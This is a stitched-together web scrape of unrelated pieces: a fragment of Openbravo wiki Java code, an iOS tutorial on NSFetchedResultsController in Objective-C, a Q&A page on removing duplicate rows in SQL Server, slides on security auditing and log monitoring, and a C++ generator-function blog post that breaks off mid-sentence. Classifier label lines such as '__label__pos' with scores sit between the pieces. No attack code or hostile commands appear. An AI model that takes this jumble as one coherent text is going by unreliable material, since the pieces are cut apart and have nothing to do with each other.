setObuiappViewRoleAccessList(List<ViewRoleAccess> obuiappViewRoleAccessList) { set(PROPERTY_OBUIAPPVIEWROLEACCESSLIST, obuiappViewRoleAccessList); } } Retrieved from "http://wiki.openbravo.com/wiki/ERP/3.0/Developers_Guide/Reference/Entity_Model/ADRole" This page has been accessed 1,705 times. This page was last modified on 24 June 2019, at 15:58. Content is available under Creative Commons Attribution-ShareAlike 2.5 Spain License.
__label__pos
0.7752
  Why You Should Use NSFetchedResultsController? NSFetchedResultsController is a very useful class provided by the CoreData framework. It solves many performance issues you frequently run into while reading a large amount of data from database and displaying that data using a UITableview, UICollectionView or MKMapView. You should always use the fetched results controller unless you have a good reason not to. In this post, I would like to show you why using a fetched results controller is a good idea. Consider an app that shows a list of news feed related to Apple products using a table view. We will call this app FeedLoader. When a row in feed table view is tapped, it shows more information about the feed in a detail view. feed_loader_app.png Initial Design # We can approach the design of this app in multiple ways, but the one below will provide us a good context for discussing why not using a fetched results controller might not be a good idea. without_fetchedresultscontroller_design.png Although the figure above has a lot of boxes, the design is not that complicated. I will walk you through it. Not wanting to create a God class that consumes every responsibility in the app, I have created multiple classes each responsible for one thing. The app is primarily responsible for following tasks: I won’t explain every aspect of the FeedLoader app in this post. I will highlight only those that are relevant to the discussion of NSFetchedResultsController. I have tried to write the code for FeedLoader in a clean way. Hopefully, you will be able to read it with relative ease. Download News Feed # Let’s assume that there exists a news feed service that provides API for fetching news published between certain dates. When the user enters the feed list view, the process of downloading the latest news feed is initiated. Once the feed is downloaded, we persist them in a local database. That way we don’t need to make unnecessary calls to the news feed service when we want to show the feed that was already downloaded in the past. To keep things simple, we will read feed data from a JSON file stored locally instead of downloading it from a remote feed service. We can accommodate this change in our design by creating a protocol named FeedFetcher and a concrete class named FileFeedFetcher that conforms to this protocol. @protocol FeedFetcher <NSObject> - (void)fetchFeedWithCompletionHandler: (void(^)(id JSON, NSError *error))handler; @end @interface FileFeedFetcher : NSObject <FeedFetcher> @end @implementation FileFeedFetcher - (void)fetchFeedWithCompletionHandler: (void (^)(id JSON, NSError *error))handler { NSString *filePath = [[NSBundle mainBundle] pathForResource:@"feeds" ofType:@"json"]; NSData *jsonData = [NSData dataWithContentsOfFile:filePath]; NSError *error = nil; NSArray *jsonObjects = [NSJSONSerialization JSONObjectWithData:jsonData options:0 error:&error]; if (jsonObjects == nil) { NSLog(@"Unable to parse feeds JSON: %@", error.description); handler(nil, error); } else { handler(jsonObjects, nil); } } @end In the future, when we actually download a list of feeds from a remote server, we can easily create a class named ServerFeedFetcher that conforms to the FeedFetcher protocol as well. We can then inject a server feed fetcher instead of a file feed fetcher without having to change anything in FeedManager. feed_fetcher_interface.png @implementation ObjectConfigurator - (FeedManager *)feedManager { FeedManager *feedManager = [[FeedManager alloc] init]; [feedManager setFeedFetcher:[[ServerFeedFetcher alloc] init]]; // ... return feedManager; } @end ObjectConfigurator provides a light-weight framework for injecting dependencies. You can checkout the create_basic_setup branch from FeedLoader repo to see its full implementation. Through out this blog post, I will ask you to checkout a specific branch so that you can see various stages of the app in code as we change its design iteratively. Persist News Feed Locally # Once the FeedManager has retrieved feed JSON (either from a remote service or a local JSON file), it tells FeedBuilder to build Feed objects from that JSON. FeedBuilder creates a new Feed object only if one with the same source URL already doesn’t exist in database. When the builder is done creating Feed objects, it will tell FeedDataManager to persist them in a local database. Finally, it returns the Feed objects back to the FeedManager. FeedDataManager provides a layer of abstraction on top of Core Data. Instead of passing around the managed object context to any class that might need to query feed related data from the database and sprinkling complex fetch request code all over the place, we can simply ask FeedDataManager to perform specific data related task for us. For example, checking whether a Feed object with a specific source URL already exists or not. Display News Feed # FeedListViewController uses custom cells of type FeedCard to display the feed information in a UITableView. Rather than creating the cells itself, the list view controller delegates that task to an object that conforms to the FeedListDataSource protocol. (A default implementation of the FeedListDataSource protocol is provided in FeedListDefaultDataSource class). The data source accepts an array of Feed objects. When the table view needs to display a cell at a specific indexpath, it asks the data source to provide that cell. The data source then creates a FeedCard instance, populates it with feed data and gives it to the tableview. Download and Cache Feed Image # All information required to display a news feed is persisted in database except the image data. Feed objects store image URL but not the actual image data. A third party library called SDWebImage is used to asynchronously download images from a remote server and cache them locally on disk. SDWebImage adds a category to the UIImageView class. As a result, we can initiate the loading and caching of images by sending setImageWithURL:placeholderImage: message directly to the image view included in a feed card. Images are loaded only when needed, i.e., when a feed card is visible to the user. UIImage *placeholder = [UIImage imageNamed:@"feedPlaceholderImage"]; [self.feedImageView sd_setImageWithURL:[NSURL URLWithString:feed.imageUrl] placeholderImage:placeholder]; Caching Feed Data # At this point, if you run the app second time, you will notice that the feed list is empty. The issue here is that FeedBuilder doesn’t create a new Feed object if one with the same source URL already exists in database. @implementation FeedBuilder - (NSArray *)feedsFromJSON:(NSArray *)JSON { NSMutableArray *feedsArray = [NSMutableArray array]; for (NSDictionary *feedDict in JSON) { if ([self feedExistsInDatabase:feedDict]) { continue; } Feed *feed = [self.feedDataManager newFeed]; [self fillInDetailsForFeed:feed fromDictionary:feedDict]; [feedsArray addObject:feed]; } [self.feedDataManager saveData]; return [feedsArray copy]; } @end First time we run the app, there are no Feed objects stored in the database at all. Therefore, the builder creates five new feed objects and returns them to the feed manager. On the second run, the feed builder doesn’t create any because all five feed items in feeds.json file have already been persisted in the database. As a result, the builder returns an empty array to the feed manager. To fix this issue, we need to return locally saved feeds if the builder doesn’t create new ones. We could easily accomplish that by adding following code to buildFeedsFromJSON: method in FeedManager: if ([feeds count] == 0) { feeds = [self.feedDataManager allFeed]; } However, that seems like a bit of a hack to me. Also, if you look inside feeds.json file, there are only five feed items in there. Therefore, loading them all into the feed list table view won’t cause any performance issues for now. In reality the number of news feed that needs to be displayed will be much higher than five. Although, Apple engineers have done a fantastic job of optimizing UITableView, we still need to take care of the issue of not loading too many table view rows up-front by ourselves. What we need here is a proper caching mechanism that will not only retrieve feeds from a local database if we are unable to fetch new ones from a remote server, but also is smart enough to not load too many rows unless the user needs them. This approach will make scrolling through the table view quite smooth. It will also prevent the overall memory footprint from increasing unnecessarily. Let’s start building a foundation for that caching mechanism. The first thing we need to do is create FeedCache class. @class FeedBuilder; @class FeedDataManager; @interface FeedCache : NSObject - (void)setFeedBuilder:(FeedBuilder *)feedBuilder; - (void)setFeedDataManager:(FeedDataManager *)feedDataManager; - (NSArray *)cachedFeed; - (NSArray *)addFeedToCacheFromJSON:(NSArray *)feedJSON; @end @interface FeedCache () @property (nonatomic) FeedBuilder *feedBuilder; @property (nonatomic) FeedDataManager *feedDataManager; @end @implementation FeedCache - (NSArray *)cachedFeed { return [self.feedDataManager allFeedSortedByKey:@"publishedDate" ascending:NO]; } - (NSArray *)addFeedToCacheFromJSON:(NSArray *)feedJSON { NSMutableArray *feeds = [NSMutableArray array]; for (NSDictionary *feedDict in feedJSON) { if ([self feedExistsInDatabase:feedDict]) { continue; } Feed *feed = [self.feedDataManager newFeed]; [self.feedBuilder fillInDetailsForFeed:feed fromJSON:feedDict]; [feeds addObject:feed]; } [self.feedDataManager saveData]; [self sortFeedsByPublishedDate:feeds]; return [feeds copy]; } - (BOOL)feedExistsInDatabase:(NSDictionary *)feed { return [self.feedDataManager feedExistsWithSourceUrl:feed[@"url"]]; } - (void)sortFeedsByPublishedDate:(NSMutableArray *)feeds { [feeds sortUsingComparator:^NSComparisonResult(Feed *feed1, Feed *feed2) { // The minus sign here has the effect of reversing // order from ascending to descending. return -[feed1.publishedDate compare:feed2.publishedDate]; }]; } @end When asked for cached feeds, FeedCache returns all feeds in the database stored thus far. It also allows us to add new feeds into the cache. It essentially means taking the feed JSON, creating new instances of Feed objects from that JSON, saving them into the database and returning them back to the caller. Now FeedManager can delegate the task of building Feed objects from JSON to FeedCache instead of FeedBuilder. - (void)buildFeedsFromJSON:(NSArray *)JSON { NSArray *newlyFetchedFeeds = [self.feedCache addFeedToCacheFromJSON:JSON]; if ([self.delegate respondsToSelector: @selector(feedManager:didReceiveFeeds:)]) { [self.delegate feedManager:self didReceiveFeeds:newlyFetchedFeeds]; } } Now when FeedManager is asked to fetch the latest feeds, it can simply return the ones in cache while the new ones are still being fetched. - (NSArray *)fetchFeeds { [self.feedFetcher fetchFeedWithCompletionHandler: ^(id JSON, NSError *error) { if (error) { NSLog(@"Unable to fetch feeds."); } else { [self buildFeedsFromJSON:JSON]; } }]; return [self.feedCache cachedFeed]; } The original problem of empty list when we run the app second time can now be solved by displaying the cached feeds when user enters the feed list view. - (void)viewDidLoad { // ... [self fetchFeeds]; } - (void)fetchFeeds { NSArray *feeds = [self.feedManager fetchFeeds]; [self.dataSource setFeeds:feeds]; [self.feedTableView reloadData]; } Now that we can fetch feeds incrementally, we need to give the table view data source an ability to add new feeds to its collection. @protocol FeedListTableDataSource <UITableViewDataSource, UITableViewDelegate> - (void)setFeeds:(NSArray *)feeds; - (void)addFeeds:(NSArray *)feeds; @end @implementation FeedListTableDefaultDataSource // ... - (void)addFeeds:(NSArray *)feeds { [self setFeeds:[self.feeds arrayByAddingObjectsFromArray:feeds]]; } @end Finally, we need to insert new rows into the table view when we receive new feeds from a remote server. @implementation FeedListViewController //... - (void)feedManager:(FeedManager *)manager didReceiveFeeds:(NSArray *)feeds { NSLog(@"Feed manager did receive %ld feeds", (long)[feeds count]); [self.dataSource addFeeds:feeds]; [self insertFeedsIntoTableView:feeds]; } - (void)insertFeedsIntoTableView:(NSArray *)feeds { if ([feeds count] > 0) { NSMutableArray *newRows = [NSMutableArray array]; for (int i = 0; i < [feeds count]; i++) { [newRows addObject:[NSIndexPath indexPathForRow:i inSection:0]]; } [self.feedTableView insertRowsAtIndexPaths:newRows withRowAnimation:UITableViewRowAnimationTop]; } } @end With the addition of caching, our initial design has evolved a bit as shown in figure below. basic_caching.png Following diagram shows feed data flow from end-to-end with caching in place. feed_display_workflow_with_caching.png You can checkout the add_caching branch from FeedLoader repo to see all the caching related code. Now that we have a basic caching mechanism in place, we can make it more robust by providing a way to specify how many feeds we want to fetch rather than returning everything in the database. We can also remove feeds that are not visible to the user from the table view data source. Currently, it holds onto each feed added to its collection which is quite inefficient because the collection could grow infinitely as we keep fetching new feeds. As you can see the to-do list for a robust cache keeps growing and growing as we add new performance related requirements. This is where the fetched results controller provided by Apple comes very handy. In addition to solving all caching related problems we have encountered so far, the fetched results controller also provides following: NSFetchedResultsController to the Rescue # Rather than going down a rabbit hole of implementing our own caching solution, let’s give NSFetchedResultsController a try. First thing we need to do is expose the managed object context used by our Core Data stack via the data manager. The fetched results controller interacts with Core Data directly via the managed object context. Ideally, I would have liked not to leak this implementation detail related to database to our business logic but if we want to use the fetched results controller we have no other choice. You can checkout the replace_caching_implementation_with_fetched_results_controller branch from FeedLoader repo if you would like to follow along with the code listed in this section. @interface FeedDataManager : NSObject // ... @property (nonatomic, readonly) NSManagedObjectContext *managedObjectContext; @end Now instead of manually adding the new list of feed returned by FeedManager to the data source, we can simply give it a fetched results controller. @implementation FeedListViewController - (void)viewDidLoad { // ... [self.dataSource setFetchedResultsController:self.fetchedResultsController]; } @end We also need to modify the FeedListTableDataSource protocol to take the fetched results controller instead of manually setting the feed array. @protocol FeedListTableDataSource <UITableViewDataSource, UITableViewDelegate> - (void)setFetchedResultsController: (NSFetchedResultsController *)controller; @end When we create a fetched results controller, we need to give it a fetch request that contains details such as which entity to fetch and how many of them to fetch in a batch. We can also tell it to sort the result by certain attributes such as publishedDate. Here is the code that creates a fetched results controller: - (NSFetchedResultsController *)fetchedResultsController { if (_fetchedResultsController == nil) { NSFetchRequest *fetchRequest = [NSFetchRequest fetchRequestWithEntityName:@"Feed"]; NSSortDescriptor *sortByPublishedDate = [[NSSortDescriptor alloc] initWithKey:@"publishedDate" ascending:NO]; fetchRequest.sortDescriptors = @[sortByPublishedDate]; fetchRequest.fetchBatchSize = 10; NSManagedObjectContext *context = self.feedDataManager.managedObjectContext; _fetchedResultsController = [[NSFetchedResultsController alloc] initWithFetchRequest:fetchRequest managedObjectContext:context sectionNameKeyPath:nil cacheName:nil]; _fetchedResultsController.delegate = self; } return _fetchedResultsController; } Finally, we need to implement the delegate methods the fetched results controller will call when the managed objects in Core Data are created, updated or deleted. - (void)controllerWillChangeContent:(NSFetchedResultsController *)controller { [self.feedTableView beginUpdates]; } - (void)controller:(NSFetchedResultsController *)controller didChangeObject:(id)anObject atIndexPath:(NSIndexPath *)indexPath forChangeType:(NSFetchedResultsChangeType)type newIndexPath:(NSIndexPath *)newIndexPath { UITableView *tableView = self.feedTableView; switch(type) { case NSFetchedResultsChangeInsert: [tableView insertRowsAtIndexPaths:@[newIndexPath] withRowAnimation:UITableViewRowAnimationFade]; break; case NSFetchedResultsChangeDelete: [tableView deleteRowsAtIndexPaths:@[indexPath] withRowAnimation:UITableViewRowAnimationFade]; break; case NSFetchedResultsChangeUpdate: [tableView reloadRowsAtIndexPaths:@[indexPath] withRowAnimation:UITableViewRowAnimationNone]; break; case NSFetchedResultsChangeMove: [tableView deleteRowsAtIndexPaths:@[indexPath] withRowAnimation:UITableViewRowAnimationFade]; [tableView insertRowsAtIndexPaths:@[newIndexPath] withRowAnimation:UITableViewRowAnimationFade]; break; } } - (void)controller:(NSFetchedResultsController *)controller didChangeSection:(id )sectionInfo atIndex:(NSUInteger)sectionIndex forChangeType:(NSFetchedResultsChangeType)type { switch(type) { case NSFetchedResultsChangeInsert: [self.feedTableView insertSections:[NSIndexSet indexSetWithIndex:sectionIndex] withRowAnimation:UITableViewRowAnimationFade]; break; case NSFetchedResultsChangeDelete: [self.feedTableView deleteSections:[NSIndexSet indexSetWithIndex:sectionIndex] withRowAnimation:UITableViewRowAnimationFade]; break; default: break; } } - (void)controllerDidChangeContent:(NSFetchedResultsController *)controller { [self.feedTableView endUpdates]; } When the fetched results controller is about to start sending change notifications, it will call the controllerWillChangeContent delegate method. We need to prepare the feed table view for updates in that method by calling beginUpdates. If a Feed managed object is created, deleted or updated in database, we insert, delete or update a table view row respectively. When all current change notifications provided by the fetched results controller have been received, we need to tell the table view to process all pending updates by calling endUpdates in controllerDidChangeContent: delegate method. Now we can remove all traces of FeedCache class and let the fetched results controller take over. Here is how the design looks after replacing our own caching implementation with the fetched results controller: with_fetchedresultscontroller_design.png The end-to-end feed data flow has also changed with introduction of the fetched results controller. feed_display_workflow_with_nsfetchedresultscontroller.png Conclusion # You might be thinking that this blog post has been a giant waste of time and I agree with you. In the beginning I mentioned that you should always use a fetched results controller unless you have a good reason not to. I could have stopped there and moved on with our lives, but I went on and on to show you why it’s a good idea to do that. We started with a code base that didn’t have any caching mechanism in place. We implemented our own caching and then replaced it with a NSFetchedResultsController instance. In one of the projects I worked on, I came very close to implementing functionalities already provided by NSFetchedResultsController. I thought I would share that experience with you so that you won’t waste time trying to reinvent the wheel like I did. The full code for FeedLoader app is available on GitHub.   113 Kudos   113 Kudos Now read this How to Debug Significant Location Change in iOS If an app has registered to listen for significant location change notifications, but is subsequently terminated, iOS will automatically relaunch the app into the background, if a new notification arrives. iOS generates significant... Continue →  
__label__pos
0.974118
You asked: How do I filter duplicate rows in SQL Server? How do you delete duplicate rows in SQL Server? To delete the duplicate rows from the table in SQL Server, you follow these steps: 1. Find duplicate rows using GROUP BY clause or ROW_NUMBER() function. 2. Use DELETE statement to remove the duplicate rows. How do I eliminate the duplicate rows? Remove duplicate values 1. Select the range of cells that has duplicate values you want to remove. Tip: Remove any outlines or subtotals from your data before trying to remove duplicates. 2. Click Data > Remove Duplicates, and then Under Columns, check or uncheck the columns where you want to remove the duplicates. … 3. Click OK. How can we avoid duplicate records in SQL without distinct? Below are alternate solutions : 1. Remove Duplicates Using Row_Number. WITH CTE (Col1, Col2, Col3, DuplicateCount) AS ( SELECT Col1, Col2, Col3, ROW_NUMBER() OVER(PARTITION BY Col1, Col2, Col3 ORDER BY Col1) AS DuplicateCount FROM MyTable ) SELECT * from CTE Where DuplicateCount = 1. 2. Remove Duplicates using group By. How do I remove duplicate rows in select query? The go to solution for removing duplicate rows from your result sets is to include the distinct keyword in your select statement. It tells the query engine to remove duplicates to produce a result set in which every row is unique. The group by clause can also be used to remove duplicates. IT IS INTERESTING:  What is readObject in Java? How do I select duplicate rows in SQL? To select duplicate values, you need to create groups of rows with the same values and then select the groups with counts greater than one. You can achieve that by using GROUP BY and a HAVING clause. How do I remove duplicates from a query? Remove duplicate rows 1. To open a query, locate one previously loaded from the Power Query Editor, select a cell in the data, and then select Query > Edit. For more information see Create, load, or edit a query in Excel. 2. Select a column by clicking the column header. … 3. Select Home > Remove Rows > Remove Duplicates. How do you delete one record from duplicates in SQL? So to delete the duplicate record with SQL Server we can use the SET ROWCOUNT command to limit the number of rows affected by a query. By setting it to 1 we can just delete one of these rows in the table. Note: the select commands are just used to show the data prior and after the delete occurs. How prevent duplicate rows in SQL JOIN? The keyword DISTINCT is used to eliminate duplicate rows from a query result: SELECT DISTINCT … FROM A JOIN B ON … However, you can sometimes (possibly even ‘often’, but not always) avoid the need for it if the tables are organized correctly and you are joining correctly. What is difference between unique and distinct? The main difference between unique and distinct is that UNIQUE is a constraint that is used on the input of data and ensures data integrity. While DISTINCT keyword is used when we want to query our results or in other words, output the data. IT IS INTERESTING:  Is MySQL similar to MS Access? What causes duplicate rows in SQL? If you do not include DISTINCT in a SELECT clause, you might find duplicate rows in your result, because SQL returns the JOB column’s value for each row that satisfies the search condition. Null values are treated as duplicate rows for DISTINCT. How do I find duplicate rows in SQL using Rowid? Use the rowid pseudocolumn. DELETE FROM your_table WHERE rowid not in (SELECT MIN(rowid) FROM your_table GROUP BY column1, column2, column3); Where column1 , column2 , and column3 make up the identifying key for each record. You might list all your columns.
__label__pos
1
Bài giảng Conducting Security Audits Protocol Analyzer Also called a sniffer Captures each packet to decode and analyze its contents Can fully decode application-layer network protocols The different parts of the protocol can be analyzed for any suspicious behavior pptx46 trang | Chia sẻ: vutrong32 | Ngày: 16/10/2018 | Lượt xem: 182 | Lượt tải: 0download Bạn đang xem trước 20 trang tài liệu Bài giảng Conducting Security Audits, để xem tài liệu hoàn chỉnh bạn click vào nút DOWNLOAD ở trên Conducting Security AuditsContentsDefine privilege auditsDescribe how usage audits can protect securityList the methodologies used for monitoring to detect security-related anomaliesDescribe the different monitoring toolsPrivilege AuditingA privilege can be considered a subject’s access level over an objectPrinciple of least privilegeUsers should be given only the minimal amount of privileges necessary to perform his or her job functionPrivilege auditingReviewing a subject’s privileges over an objectRequires knowledge of privilege management, how privileges are assigned, and how to audit these security settingsPrivilege ManagementThe process of assigning and revoking privileges to objectsThe roles of owners and custodians are generally well-establishedThe responsibility for privilege management can be either centralized or decentralizedCentralized and Decentralized StructuresIn a centralized structureOne unit is responsible for all aspects of assigning or revoking privilegesAll custodians are part of that unitPromotes uniform security policiesSlows response, frustrates usersA decentralized organizational structure for privilege managementDelegates the authority for assigning or revoking privileges more closely to the geographic location or end userRequires IT staff at each location to manage privilegesAssigning PrivilegesThe foundation for assigning privilegesThe existing access control model for the hardware or software being usedRecall that there are four major access control models:Mandatory Access Control (MAC)Discretionary Access Control (DAC)Role Based Access Control (RBAC)Rule Based Access Control (RBAC)Auditing System Security SettingsAuditing system security settings for user privileges involves:A regular review of user access and rightsUsing group policiesImplementing storage and retention policiesUser access and rights reviewIt is important to periodically review user access privileges and rightsMost organizations have a written policy that mandates regular reviewsAuditing System Security SettingsUser Access and Rights Review (continued)Reviewing user access rights for logging into the network can be performed on the network serverReviewing user permissions over objects can be viewed on the network serverUser Access and Rights Review (continued)Group PoliciesInstead of setting the same configuration baseline on each computer, a security template can be createdSecurity templateA method to configure a suite of baseline security settingsOn a Microsoft Windows computer, one method to deploy security templates is to use Group PoliciesA feature that provides centralized management and configuration of computers and remote users who are using Active Directory (AD)Group Policy Objects (GPOs)The individual elements or settings within group policies are known as Group Policy Objects (GPOs). GPOs are a defined collection of available settings that can be applied to user objects or AD computersSettings are manipulated using administrative template files that are included within the GPOStorage and Retention PoliciesHealth Insurance Portability and Accountability Act (HIPPA)Sarbanes-Oxley ActRequire organizations to store data for specified time periodsRequire data to be stored securelyHIPPA Sanction for Unlocked DumpstersInformation Lifecycle Management (ILM)A set of strategies for administering, maintaining, and managing computer storage systems in order to retain dataILM strategies are typically recorded in storage and retention policies Which outline the requirements for data storageData classificationAssigns a level of business importance, availability, sensitivity, security and regulation requirements to dataData CategoriesData CategoriesGrouping data into categories often requires the assistance of the users who save and retrieve the data on a regular basisThe next step is to assign the data to different levels or “tiers” of storage and accessibilityContentsDefine privilege auditsDescribe how usage audits can protect securityList the methodologies used for monitoring to detect security-related anomaliesDescribe the different monitoring toolsUsage AuditingAudits what objects a user has actually accessedInvolves an examination of which subjects are accessing specific objects and how frequentlySometimes access privileges can be very complexUsage auditing can help reveal incorrect permissionsInheritancePermissions given to a higher level “parent” will also be inherited by a lower level “child”Inheritance becomes more complicated with GPOsPrivilege InheritanceGPO InheritanceGPO inheritanceAllows administrators to set a base security policy that applies to all users in the Microsoft ADOther administrators can apply more specific policies at a lower levelThat apply only to subsets of users or computersGPOs that are inherited from parent containers are processed firstFollowed by the order that policies were linked to a container objectLog ManagementA log is a record of events that occurLogs are composed of log entriesEach entry contains information related to a specific event that has occurredLogs have been used primarily for troubleshooting problemsLog managementThe process for generating, transmitting, storing, analyzing, and disposing of computer security log dataApplication and Hardware LogsSecurity application logsAntivirus softwareRemote Access SoftwareAutomated patch update serviceSecurity hardware logsNetwork intrusion detection systems and host and network intrusion prevention systemsDomain Name System (DNS)Authentication serversProxy serversFirewallsAntivirus LogsDNS LogsFirewall LogsFirewall LogsTypes of items that should be examined in a firewall log include:IP addresses that are being rejected and droppedProbes to ports that have no application services running on themSource-routed packetsPackets from outside with false internal source addressesSuspicious outbound connectionsUnsuccessful loginsOperating System LogsSystem eventsSignificant actions performed by the operating systemShutting down the systemStarting a serviceSystem EventsSystem events that are commonly recorded include:Client requests and server responsesUsage informationLogs based on audit recordsThe second common type of security-related operating system logsAudit records that are commonly recorded include:Account activity, such as escalating privilegesOperational information, such as application startup and shutdownWindows 7 Event LogsLog Management BenefitsA routine review and analysis of logs helps identifySecurity incidentsPolicy violationsFraudulent activityOperational problems Logs can also help resolve problemsLog Management BenefitsLogs helpPerform auditing analysisThe organization’s internal investigationsIdentify operational trends and long-term problemsDemonstrate compliance with laws and regulatory requirementsChange ManagementA methodology for making changes and keeping track of those changesTwo major types of changes Any change in system architectureNew servers, routers, etc.Data classificationDocuments moving from Confidential to Standard, or Top Secret to SecretChange Management Team (CMT)Created to oversee changesAny proposed change must first be approved by the CMTThe team typically has: Representatives from all areas of IT (servers, network, enterprise server, etc.)Network securityUpper-level managementChange Management Team (CMT) DutiesReview proposed changesEnsure that the risk and impact of the planned change is clearly understoodRecommend approval, disapproval, deferral, or withdrawal of a requested changeCommunicate proposed and approved changes to co-workersContentsDefine privilege auditsDescribe how usage audits can protect securityList the methodologies used for monitoring to detect security-related anomaliesDescribe the different monitoring toolsAnomaly-based MonitoringDetecting abnormal traffic BaselineA reference set of data against which operational data is comparedWhenever there is a significant deviation from this baseline, an alarm is raisedAdvantageDetect the anomalies quicklyAnomaly-based MonitoringDisadvantagesFalse positivesAlarms that are raised when there is no actual abnormal behaviorNormal behavior can change easily and even quicklyAnomaly-based monitoring is subject to false positivesSignature-based MonitoringCompares activities against signaturesRequires access to an updated database of signaturesWeaknessesThe signature databases must be constantly updatedAs the number of signatures grows the behaviors must be compared against an increasingly large number of signatures New attacks will be missed, because there is no signature for themBehavior-based MonitoringAdaptive and proactive instead of reactiveUses the “normal” processes and actions as the standardContinuously analyzes the behavior of processes and programs on a systemAlerts the user if it detects any abnormal actionsAdvantageNot necessary to update signature files or compile a baseline of statistical behaviorBehavior-based MonitoringMonitoring ToolsPerformance baselines and monitorsPerformance baselineA reference set of data established to create the “norm” of performance for a system or systemsData is accumulated through the normal operations of the systems and networks through performance monitorsOperational data is compared with the baseline data to determine how closely the norm is being met and if any adjustments need to be madeSystem MonitorA low-level system programMonitors hidden activity on a deviceSome system monitors have a Web-based interfaceSystem monitors generally have a fully customizable notification systemThat lets the owner design the information that is collected and made availableProtocol AnalyzerAlso called a snifferCaptures each packet to decode and analyze its contentsCan fully decode application-layer network protocolsThe different parts of the protocol can be analyzed for any suspicious behavior Các file đính kèm theo tài liệu này: • pptx08_conducting_security_audits_6248.pptx Tài liệu liên quan
__label__pos
0.918067
Generator functions in C++ In the previous post we had a look at the proposal of introducing resumable functions into the C++ standard to support writing asynchronous code modeled on the C# async/await pattern. We saw that it is already possible to experiment with the future resumable and await keywords in Visual Studio, by installing the latest November 2013 CTP. But the concept of resumable functions is not limited to asynchrony; in this post we’ll see how it can be expanded to support generator functions. Generator functions and lazy evaluation In several languages, like C# and Python, generator functions provide the ability of lazily producing the values in a sequence only when they are needed. In C# a generator (or iterator) is a method that contains at least one yield statement and that returns an IEnumerable<T>. For example, the following C# code produces the sequence of Fibonacci numbers (1, 1, 2, 3, 5, 8, 13, 21, …): IEnumerable<T> Fibonacci() { int a = 0; int b = 1; while (true) { yield return b; int tmp = a + b; a = b; b = tmp; } } A generator acts in two phases. When it is called, it just sets up a resumable function, preparing for its execution, and returns some enumerator (in the case of C#, an IEnumerable<T>). But the actual execution is deferred to the moment when the values are actually enumerated and pulled from the sequence, for example with a foreach statement: foreach (var num in Fibonacci()) { Console.WriteLine("{0}", num); } Note that the returned sequence is potentially infinite; its enumeration could go on indefinitely (if we ignore the integer overflows). Of course there is nothing particularly special about doing the same thing in C++. While STL collections are usually eagerly evaluated (all their values are produced upfront) it is not difficult to write a collection that provides iterators that calculate their current value on the spot, on the base of some state or heuristic. What gives a particular expressive power to generators is the ability to pause the execution each time a new value is generated, yielding control back to the caller, and then to resume the execution exactly from the point where it had suspended. A generator is therefore a special form of coroutine, limited in the sense that it may only yield back to its caller. The yield statement hides all the complexity inherent in the suspension and resumption of the function; the developer can express the logic of the sequence plainly, without having to setup callbacks or continuations. From resumable functions to generators (and beyond) It would be nice to bring the expressive power of generators to our good old C++, and naturally there is already some work going on for this. In this proposal Gustaffson et al. explain how generator functions could be supported by the language as an extension of resumable functions, making it possible to write code like: sequence<int> fibonacci() resumable { int a = 0; int b = 1; while (true) { yield b; int tmp = a + b; a = b; b = tmp; } } Here, the proposal introduces two new concepts, the type sequence<T> and the yield keyword. –        sequence<T> is a (STL-like) collection that only supports iteration and only provides an input iterator. –        The yield statement suspends the execution of the function and returns one item from the sequence to the caller. In C# terms, sequence<T> and its iterator are respectively the equivalent of an IEnumerable<T> and IEnumerator<T>. But while the C# generators are implemented with a state machine, in C++ the suspension and resumption would be implemented, as we’ll see, with stackful coroutines. Once we had a lazy-evaluated sequence<T> we could write client code to pull a sequence of values, which would be generated one at the time, and only when requested: sequence<int> fibs = fibonacci(); for (auto it = fibs.begin(); it != fibs.end(); ++it) { std::cout << *it << std::endl; } In C++11 we could also simplify the iteration with a range-based for loop: sequence<int> fibs = fibonacci(); for (auto it : fibs) { std::cout << *it << std::endl; } More interestingly, we could define other resumable functions that manipulate the elements of a sequence, lazily producing another sequence. This example, taken from Gustaffson’s proposal, shows a lazy version of std::transform(): template<typename Iter> sequence<int> lazy_tform(Iter beg, Iter end, std::function<int(int)> func) resumable { for (auto iter = beg; iter != end; ++iter) { yield func(*iter); } } Moving further with this idea, we could pull another page out of the C# playbook and enrich the sequence class with a whole set of composable, deferred query operators, a la LINQ: template <typename T> class sequence { public: template <typename Predicate> bool all(Predicate predicate); [...] static sequence<int> range(int from, int to); template <typename TResult> sequence<TResult> select(std::function<TResult(T)> selector); sequence<T> take(int count); sequence<T> where(std::function<bool(T)> predicate); }; Lazy sequences Certainly, resumable generators would be a very interesting addition to the standard. But how would they work? We saw that the Visual Studio CTP comes with a first implementation of resumable functions built over the PPL task library, but in this case the CTP is of little help, since it does not support generator functions yet. Maybe they will be part of a future release… but why to wait? We can implement them ourselves! 🙂 In the rest of this post I’ll describe a possible simple implementation of C++ lazy generators. Let’s begin with the lazy sequence<T> class. This is a STL-like collection which only needs to support input iterators, with a begin() and an end() method. Every instance of this class must somehow be initialized with a functor that represents the generator function that will generate the values of the sequence. We’ll see later what can be a good prototype for it. As we said, the evaluation of this function must be deferred to the moment when the values are retrieved, one by one, via the iterator. All the logic for executing, suspending and resuming the generator will actually be implemented by the iterator class, which therefore needs to have a reference to the same functor. So, our first cut at the sequence class could be something like this: template<typename T> class sequence_iterator { // TO DO }; template<typename T> class sequence { public: typedef typename sequence_iterator<T> iterator; typedef ??? functor; sequence(functor func) : _func(func) { } iterator begin() { return iterator(_func); } iterator end() { return iterator(); } private: functor _func; }; Step by step The sequence<T> class should not do much more than create iterators. The interesting code is all in the sequence iterator, which is the object that has the ability to actually generate the values. Let’s go back to our Fibonacci generator and write some code that iterates through it: sequence<int> fibonacci() resumable { int a = 0; int b = 1; while (true) { yield b; int tmp = a + b; a = b; b = tmp; } } auto fibs = fibonacci(); for (auto it : fibs) { std::cout << *it << std::endl; } How should this code really work? Let’s follow its execution step by step. 1. First, we call the function fibonacci(), which returns an object of type sequence<int>. Note that at this point the execution of the function has not even started yet. We just need to return a sequence object somehow associated to the body of the generator, which will be executed later. 2. The returned sequence is copied into the variable fibs. We need to define what does it mean to copy a sequence: should we allow copy operations? Should we enforce move semantic? 3. Given the sequence fibs, we call the begin() method which returns an iterator “pointing ” to the first element of the sequence. The resumable function should start running the moment the iterator is created and execute until a first value is yielded (or until it completes, in case of empty sequences). 4. When the end() method is called, the sequence returns an iterator that represents the fact that the generator has completed and there are no more values to enumerate. 5. The operator == () should behave as expected, returning true if both iterators are at the same position of the same sequence, or both pointing at the end of the sequence. 6. The operator *() will return the value generated by the last yield statement (i.e., the current value of the sequence). 7. At each step of the iteration, when operator ++() is called, the execution of the generator function will be resumed, and will continue until either the next yield statement updates the 